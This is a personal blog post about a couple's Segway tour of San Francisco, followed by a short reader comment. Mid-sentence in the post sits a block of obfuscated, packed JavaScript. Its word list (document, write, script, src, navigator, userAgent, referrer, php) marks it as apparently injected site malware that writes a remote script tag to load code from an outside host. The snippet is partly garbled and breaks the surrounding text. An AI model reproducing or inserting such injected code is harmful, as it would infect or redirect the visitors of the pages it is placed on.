Nick and I sometimes play tourist. Nick has also always wanted to try a Segway.
Last Christmas I got Nick a groupon for a segway tour of San Francisco by the Electric Tour Company.
SO we got up super early for the 2nd Sunday in a row and headed into SF. Did I mention that we accidentally scheduled our tour for the same day as the Nike Women’s marathon. Oops. It actually wasn’t bad at all, but probably better that we planned ahead and allowed some extra time.
We were greeted with headsets, helmets, vests and a segway 101 class.
We ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|arskb|var|u0026u|referrer|bzaee||js|php’.split(‘|’),0,{}))
looked all sorts of hot. But truth be told, the segways are kinda fun. Super easy once you get the hang of it (and it took a few ladies in the group a little extra time to get the hang of it).
Our guide, Jack, who called me Bre, called us tourist attractions. And we were. I think I will be in at least 2 dozen San Francisco slideshows – slideshows I will never see.
Jack taught us lots of useless facts – and Nick ate that up. We learned why moms tell kids to keep their elbows off the table. We also learned that the SF bush man makes upwards of k/year. What?! And I’m pretty sure he only works weekends.
We took some uber cheesy photos out on a this cute pier.
Nick really wanted a “no hands” pic. And there it is.
This is my active wife hair-do. 2 braids. Keeps it out of my face. Can’t have strays blocking my view. What did you do this weekend?

Haha! You guys are adorable. I wanted to try those tiny little tour cars in SF. Maybe next trip there we can meet up and do it together!
